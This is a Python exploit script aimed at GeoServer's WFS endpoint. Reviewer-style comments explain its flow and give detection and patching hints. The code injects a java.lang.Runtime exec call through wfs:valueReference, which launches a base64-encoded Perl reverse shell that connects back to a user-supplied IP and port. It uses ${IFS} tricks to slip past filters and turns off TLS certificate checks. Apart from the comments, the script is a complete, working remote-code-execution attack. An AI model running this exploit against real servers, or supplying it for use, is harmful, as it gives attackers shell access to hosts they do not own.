import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import xml.etree.ElementTree as ET
import base64
# Two-request flow against a GeoServer WFS endpoint: a GET discovers a feature
# type name, then a POST places a java.lang.Runtime exec call inside
# wfs:valueReference (the vulnerable input this script targets). Both
# responses are printed as-is; nothing is validated beyond HTTP status.
# Disable SSL warnings
# NOTE(review): every request below passes verify=False, so TLS certificate
# validation is off for the whole script; this line only hides the warning.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# Request host input from the user
# `host` is the GeoServer base URL; LHOST/LPORT are where the reverse shell
# built further down connects back to. None of the three values is validated.
host = input("Enter host (e.g., https://example.com/): ").strip()
LHOST = input("Enter IP: ").strip()
LPORT = input("Enter Listing Port: ").strip()

# Create the full URL for the first request (GET)
# ListStoredQueries is used only to discover a feature type name for the POST
# body. `host` is concatenated as typed here (no rstrip('/') as for post_url),
# so a trailing slash yields ".../geoserver" preceded by a double slash.
endpoint = "/geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0"
full_url = f"{host}{endpoint}"

# HTTP headers for the GET request
# The GET identifies itself as python-requests while the POST below spoofs a
# browser User-Agent; two requests from one client with mismatched agents is
# itself a useful signal when reviewing access logs.
headers = {
    "User-Agent": "python-requests/2.31.0",
    "Accept-Encoding": "gzip, deflate, br",
    "Accept": "*/*",
    "Connection": "keep-alive"
}

# Perform the GET request, bypassing SSL
# The outer try wraps both requests; its `except` at the very bottom is reached
# only for GET-side failures, because the POST has its own handler below.
try:
    response = requests.get(full_url, headers=headers, verify=False)
    response.raise_for_status()  # Ensure HTTP status 2xx (HTTPError is a RequestException)
    # Parse XML response
    # Server-controlled XML parsed with stdlib ElementTree; only a malformed
    # document is handled, any other parse-time problem propagates.
    try:
        xml_response = response.text
        root = ET.fromstring(xml_response)
    except ET.ParseError:
        print("Error: Response is not valid XML.")
        exit(1)  # builtin exit(); sys.exit() would be the conventional choice
    # Define the namespace for XML elements
    namespaces = {
        'wfs': 'http://www.opengis.net/wfs/2.0'
    }
    # Extract the <wfs:ReturnFeatureType> element
    # Any existing feature type will do; the first one listed is reused verbatim
    # as the typeNames attribute of the POST body.
    features = root.findall('.//wfs:ReturnFeatureType', namespaces)
    if features:
        print("Feature Type:")
        # Display the first feature
        selected_feature = features[0].text
        print(selected_feature)
    else:
        print("No Feature Type found.")
        exit(1)
    # Construct the Perl script for reverse shell
    # LHOST/LPORT are interpolated into Perl source exactly as typed; the
    # spawned shell has STDIN/STDOUT/STDERR redirected to the socket.
    perl_script = (
        f'perl -e \'use Socket;$i="{LHOST}";$p={LPORT};'
        'socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));'
        "if(connect(S,sockaddr_in($p,inet_aton($i)))){"
        'open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");'
        'exec("/bin/bash -i");};\''  # Change this shell to /bin/bash or /bin/sh if there are problems
    )
    # Base64 encode the Perl script
    base64_payload = base64.b64encode(perl_script.encode()).decode()
    # Bash command to execute the payload
    # ${IFS} stands in for spaces and the payload is decoded with `base64 -d`
    # before being piped to sh; both are common filter-evasion markers that
    # a WAF or IDS rule on WFS request bodies can key on.
    bash_command = f"sh -c echo${{IFS}}{base64_payload}|base64${{IFS}}-d|sh"

    # Construct the XML body for the POST request
    # This is the vulnerable request: wfs:valueReference is meant to hold a
    # property name / XPath, but an unpatched server evaluates it as an
    # expression, so the java.lang.Runtime exec call placed there runs on the
    # GeoServer host. Detection: a valueReference containing "exec(" or
    # "java.lang.Runtime" is never a legitimate property reference.
    # Mitigation: a fixed GeoServer/GeoTools release (see the vendor advisory).
    post_body = f"""
<wfs:GetPropertyValue service='WFS' version='2.0.0'
xmlns:topp='http://www.openplans.org/topp'
xmlns:fes='http://www.opengis.net/fes/2.0'
xmlns:wfs='http://www.opengis.net/wfs/2.0'>
<wfs:Query typeNames='{selected_feature}'/>
<wfs:valueReference>exec(java.lang.Runtime.getRuntime(), "{bash_command}")</wfs:valueReference>
</wfs:GetPropertyValue>
"""

    # Create the full URL for the POST request
    post_url = f"{host.rstrip('/')}/geoserver/wfs"

    # HTTP headers for the POST request
    # NOTE(review): requests computes Content-Length itself from `data`; the
    # manual value here counts characters, not bytes, so it is only accurate
    # while selected_feature is pure ASCII.
    post_headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
        "Accept-Encoding": "gzip, deflate, br",
        "Accept": "*/*",
        "Connection": "keep-alive",
        "Content-Type": "application/xml",
        "Content-Length": str(len(post_body))  # Set content length
    }

    # Perform the POST request with the XML body
    # Only transport/HTTP-level failures are reported; the body is printed
    # unconditionally, so success of the injected command is not checked here.
    try:
        post_response = requests.post(post_url, data=post_body, headers=post_headers, verify=False)
        post_response.raise_for_status()  # Ensure HTTP status 2xx
        # Display the response from the POST request
        print("\nResponse Status (POST):", post_response.status_code)
        print("Response Body (POST):")
        print(post_response.text)
    except requests.exceptions.RequestException as e:
        print(f"Error while making POST request: {e}")
except requests.exceptions.RequestException as e:
    print(f"Error while making GET request: {e}")